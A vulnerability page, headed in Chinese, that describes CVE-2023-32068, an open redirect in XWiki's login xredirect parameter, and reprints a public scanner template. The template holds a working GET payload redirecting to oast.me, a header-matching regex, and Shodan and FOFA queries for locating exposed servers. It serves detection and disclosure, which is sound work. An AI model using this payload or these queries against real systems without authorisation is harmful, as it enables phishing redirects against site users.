漏洞描述
XWiki Platform is vulnerable to open redirect attacks due to improper validation of the xredirect parameter. This allows an attacker to redirect users to an arbitrary website. The vulnerability is patched in versions 14.10.4 and 15.0.
CVE-2023-32068: XWiki - Open Redirect
PoC代码[已公开]
id: CVE-2023-32068
info:
name: XWiki - Open Redirect
author: ritikchaddha
severity: medium
description: |
XWiki Platform is vulnerable to open redirect attacks due to improper validation of the xredirect parameter. This allows an attacker to redirect users to an arbitrary website. The vulnerability is patched in versions 14.10.4 and 15.0.
impact: |
An attacker can craft malicious URLs to redirect users to malicious websites.
remediation: |
Implement proper input validation and sanitize user-controlled input to prevent open redirect vulnerabilities.
reference:
- https://jira.xwiki.org/browse/XWIKI-20096
- https://nvd.nist.gov/vuln/detail/CVE-2023-32068
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-32068
cwe-id: CWE-601
epss-score: 0.65025
epss-percentile: 0.98426
cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: xwiki
product: xwiki
shodan-query: html:"data-xwiki-reference"
fofa-query: body="data-xwiki-reference"
tags: cve,cve2023,xwiki,redirect
http:
- method: GET
path:
- "{{BaseURL}}/bin/login/XWiki/XWikiLogin?xredirect=//oast.me"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$'
# digest: 4a0a00473045022100873eaf03c7594766fd8b0cc625d734e9d5ab0c273f32e84bcb275ce2e5f3fab602206c308caae118c304aa9ab8b5b219b6da78f60ebbd5bfbaa0d7ebea370e1526cf:922c64590222798bb761d5b6d8e72950